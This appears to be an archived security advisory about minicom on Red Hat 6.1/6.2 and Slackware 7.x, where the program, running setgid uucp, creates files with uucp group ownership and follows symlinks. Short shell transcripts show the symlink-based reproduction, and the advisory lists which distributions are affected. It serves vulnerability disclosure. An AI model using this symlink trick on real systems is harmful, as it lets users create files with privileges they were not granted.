

    RH 6.1 / 6.2


    Michal Zalewski  found following.   On RedHat  6.1 and  RedHat 6.2

        @(#)Minicom V1.83.0 (compiled Mar  7 2000)(c) Miquel van Smoorenburg

        [lcamtuf@nimue lcamtuf]$ minicom -C foo
        minicom: there is no global configuration file /etc/minirc.dfl
        Ask your sysadm to create one (with minicom -s).

        [lcamtuf@nimue lcamtuf]$ ls -l foo
        -rw-rw-r--   1 lcamtuf  uucp            0 Aug 18 12:21 foo
            ^^                  ^^^^

    Any file can  be created anywhere  with uucp privledges  - it will
    follow symlinks.  Not nice on systems running uucp services.

    And  the  confirmation  on  Slackware  7.x  using minicom 1.82 and

        Slackware 7.0
            me@technolust> ln -s /tmp/foo .
            me@technolust> ls -al /tmp/foo
            ls: /tmp/foo: No such file or directory
            me@technolust> (umask 2; minicom -C foo)
            minicom: cannot open /dev/ttyS1: Permission denied
            me@technolust> ls -al /tmp/foo
            -rw-rw-r--   1 me     uucp            0 Aug 30 16:49 /tmp/foo
        Slackware 7.1
            me@mos> ln -s /tmp/foo .
            me@mos> ls -al /tmp/foo
            ls: /tmp/foo: No such file or directory
            me@mos> (umask 2; minicom -C foo)
            minicom: cannot open /dev/ttyS1: Permission denied
            me@mos> ls -al /tmp/foo
            -rw-rw-r--   1 me     uucp           0 Aug 30 16:46 /tmp/foo


    Mandrake  7.1  did  not  do  this..   On  FreeBSD 4.1-STABLE, with
    minicom 1.83.1, and the file  "foo" were created with the  correct
    uid/gid, using the default umask.

    SuSE ships version 1.81.1 since  July 27 1998 (that's back  to the
    good old  SuSE-5.3 times)  until now  with SuSE-7.0.   minicom  is
    installed root.uucp 0755 in all versions.

    `chmod 2755 /usr/bin/minicom' and `minicom -C foo' afterwards does
    not exhibit any problem  because no file is  created.  For a  user
    of a SuSE system to be  able to use minicom (restricted by  device
    permissions), she must be added to group uucp.

    Conectiva Linux is not affected by this.

    Debian/GNU Linux does  not install minicom  set[ug]id, and is  not
    vulnerable... verified on 2.1 (slink), 2.2 (potato), and "woody".